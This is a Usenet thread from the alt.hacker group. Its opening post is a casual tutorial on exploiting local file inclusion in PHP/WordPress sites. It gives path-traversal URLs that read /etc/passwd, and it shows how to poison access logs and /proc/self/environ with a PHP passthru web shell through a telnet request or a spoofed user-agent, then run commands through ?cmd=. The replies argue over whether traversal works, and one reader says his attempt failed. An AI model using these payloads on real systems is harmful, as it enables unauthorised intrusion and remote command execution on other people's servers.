1. Forum
  2. Usenet
  3. ALT.HACKER

  • Anatomy of the hack...

    From gh0stanon@21:1/5 to All on Sun Mar 21 05:27:48 2021
    LFI Local File Inclusion hack

    So, let's say we wrote ourselves a little shell script to check for host vulnerable to LFI from something like the wordpress module wp-config.php
    or something similiar.

    Once we have a vulnerable host, we can now do things like adding this to
    end of the module path
    wp-config.php?file=../../../../../etc/passwd to see all the user
    accounts on this system. But better than that we can do something really
    nifty like this...

    telnet fuckwit.com 80
    get <? passthru($_GET['cmd']); ?> HTTP/1.1


    So that will obviously throw up an error but that is okay because all we
    really wanted was to get that string logged. :-)

    Confused? Well how about we include the log file? okay...

    fuckwit.com/index.php?file=../../../../../../../../var/log/access.log?cmd=whoami

    Interesting yet? Okay, maybe you can't seem to locate that log file and
    things are not working. Well there is something you can still try to get
    that string to work for you. It's called /proc/self/environ and it
    stores information about your user-agent. How about we get one of those
    little browser extensions that allow you to change your userhost and we
    change that to <?php passthru($_GET['cmd']); ?> :-D See what we did
    there?

    Now that string is in /proce/self/environ after you connected and you
    can easily /index.php?file=../../../../../../proc/self/environ

    Get the picture?



    --
    +++>> gh0stAnon <<+++
    cloakn3kcia4pnos.onion port 6697 ssl
    cloaknet@REMOVEriseup.net
    Twitter: @locogh0st

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Big Bad Bob@21:1/5 to All on Mon Mar 22 02:38:46 2021
    On 2021-03-20 22:27, gh0stanon wrote:
    LFI Local File Inclusion hack

    So, let's say we wrote ourselves a little shell script to check for host vulnerable to LFI from something like the wordpress module wp-config.php
    or something similiar.

    Once we have a vulnerable host, we can now do things like adding this to
    end of the module path
    wp-config.php?file=../../../../../etc/passwd to see all the user

    nearly every web server I know of won't allow you to access the file
    system by use of '../'


    --
    (aka 'Bombastic Bob' in case you wondered)

    'Feeling with my fingers, and thinking with my brain' - me

    'your story is so touching, but it sounds just like a lie'
    "Straighten up and fly right"

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Lurk@21:1/5 to Big Bad Bob on Mon Mar 22 09:48:09 2021
    On 22/03/2021 09:38, Big Bad Bob wrote:
    On 2021-03-20 22:27, gh0stanon wrote:
    LFI Local File Inclusion hack

    So, let's say we wrote ourselves a little shell script to check for host
    vulnerable to LFI from something like the wordpress module wp-config.php
    or something similiar.

    Once we have a vulnerable host, we can now do things like adding this to
    end of the module path
    wp-config.php?file=../../../../../etc/passwd to see all the user

    nearly every web server I know of won't allow you to access the file
    system by use of '../'


    damm... so that's why it didn't work :(

    --
    I psot (here) therefore I lurk (elsewhere).

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From gh0stanon@21:1/5 to Big Bad Bob on Mon Mar 22 11:42:11 2021
    On 2021-03-22, Big Bad Bob <BigBadBob-at-mrp3-dot-com@testing.local> wrote:
    On 2021-03-20 22:27, gh0stanon wrote:
    LFI Local File Inclusion hack

    So, let's say we wrote ourselves a little shell script to check for host
    vulnerable to LFI from something like the wordpress module wp-config.php
    or something similiar.

    Once we have a vulnerable host, we can now do things like adding this to
    end of the module path
    wp-config.php?file=../../../../../etc/passwd to see all the user

    nearly every web server I know of won't allow you to access the file
    system by use of '../'



    with LFI enabled you can. LFI could not work without being able to

    Hope that helps

    --
    +++>> gh0stAnon <<+++
    cloakn3kcia4pnos.onion port 6697 ssl
    cloaknet@REMOVEriseup.net
    Twitter: @locogh0st

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Lurk@21:1/5 to All on Mon Mar 22 11:44:27 2021
    On 22/03/2021 11:42, gh0stanon wrote:
    On 2021-03-22, Big Bad Bob <BigBadBob-at-mrp3-dot-com@testing.local> wrote:
    On 2021-03-20 22:27, gh0stanon wrote:
    LFI Local File Inclusion hack

    So, let's say we wrote ourselves a little shell script to check for host >>> vulnerable to LFI from something like the wordpress module wp-config.php >>> or something similiar.

    Once we have a vulnerable host, we can now do things like adding this to >>> end of the module path
    wp-config.php?file=../../../../../etc/passwd to see all the user

    nearly every web server I know of won't allow you to access the file
    system by use of '../'



    with LFI enabled you can. LFI could not work without being able to

    Hope that helps

    :)
    Helps me mate !

    --
    I psot (here) therefore I lurk (elsewhere).

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)